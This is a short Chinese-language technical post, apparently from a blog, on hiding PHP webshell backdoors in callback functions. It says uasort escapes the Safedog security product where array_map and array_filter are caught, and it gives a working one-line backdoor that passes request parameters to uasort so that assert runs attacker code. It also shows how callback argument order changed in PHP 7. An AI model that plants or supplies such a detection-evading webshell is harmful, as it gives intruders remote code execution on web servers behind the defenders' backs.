在php中 存在回調函數參數的函數,都有可能作爲後門
比如array_map , array_filter 這類數組操作的回調函數,但是在安全狗下會被殺掉
但是uasort 這類函數不會被殺掉。
php5.4.8之後的assert
在5.4.8之後,assert函數由一個參數,變成了兩個參數。增加了一個可選參數descrition:
| 5.4.8 增加了參數 description。 description 現在也作爲第四個參數提供給 ASSERT_CALLBACK 模式裏的回調函數。 |
那麼這裏就可以使用有兩個參數的回調函數了,比如
<?php $e = $_REQUEST['e']; $arr = array($_REQUEST['pass'] , 'te'); uasort($arr , $e);
在php5.3環境下會報錯,因爲5.3的assert只有一個參數。
在php5.4以後就可以執行了
這裏的傳遞參數的順序也有變化,在php7之前不包括PHP7 , 傳遞參數是array的第一個參數就是回調函數的第二個參數。
在php7及以後,array的第一個參數是回調函數的第一個參數。
比如:
function mysort($var_1 , $var_2)
{
echo "var_1 : ".$var_1."<br>";
echo "var_2 : ".$var_2."<br>";
}
$arr = array("1" , "2");
uasort($arr , 'mysort');在php7以前的環境輸出:
var_1 : 2
var_2 : 1
在php7及其以後的環境輸出:
var_1 : 1
var_2 : 2